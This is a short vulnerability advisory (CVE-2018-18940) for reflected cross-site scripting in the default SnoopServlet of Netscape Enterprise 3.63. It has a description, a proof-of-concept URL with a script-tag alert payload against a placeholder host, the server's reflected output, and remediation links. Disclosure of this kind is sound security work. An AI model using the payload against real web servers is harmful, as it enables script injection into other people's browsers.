Netscape Enterprise 3.63 Cross Site Scripting

`<!--  
# Exploit Title: Cross Site Scripting in default SnoopServlet servlet  
Netscape Enterprise 3.63  
# Date: 05-11-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: https://en.wikipedia.org/wiki/Netscape  
# Software Link: https://en.wikipedia.org/wiki/Netscape  
# Version: Netscape Enterprise 3.63  
# Tested on: all  
# CVE : CVE-2018-18940  
# Category: webapps  
  
1. Description  
  
The servlet/SnoopServlet (a servlet installed by default) in Netscape  
Enterprise 3.63 has reflected XSS via an arbitrary parameter=[XSS] in the  
query string. A remote unauthenticated attacker could potentially exploit  
this vulnerability to supply malicious HTML or JavaScript code to a  
vulnerable web application, which is then reflected back to the victim and  
executed by the web browser.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/servlet/SnoopServlet?XSS=<script>alert("XSS")</script>  
  
The server response:  
  
> Request URL:  
>  
> http://X.X.X.X/servlet/SnoopServlet  
>  
> Request information:  
>  
> Request method: GET  
> Request URI: /servlet/SnoopServlet  
> Request protocol: HTTP/1.1  
> Servlet path: /servlet/SnoopServlet  
> Path info: <none>  
> Path translated: /PATHINSTALLED/netsrv2/AccessService/enterprise3.63/doc/  
> Query string: PARAM=[XSS]  
  
3. Solution:  
  
The product is discontinued. Update to last version this product. See more  
in https://en.wikipedia.org/wiki/Netscape  
Patch:  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
  
-->  
`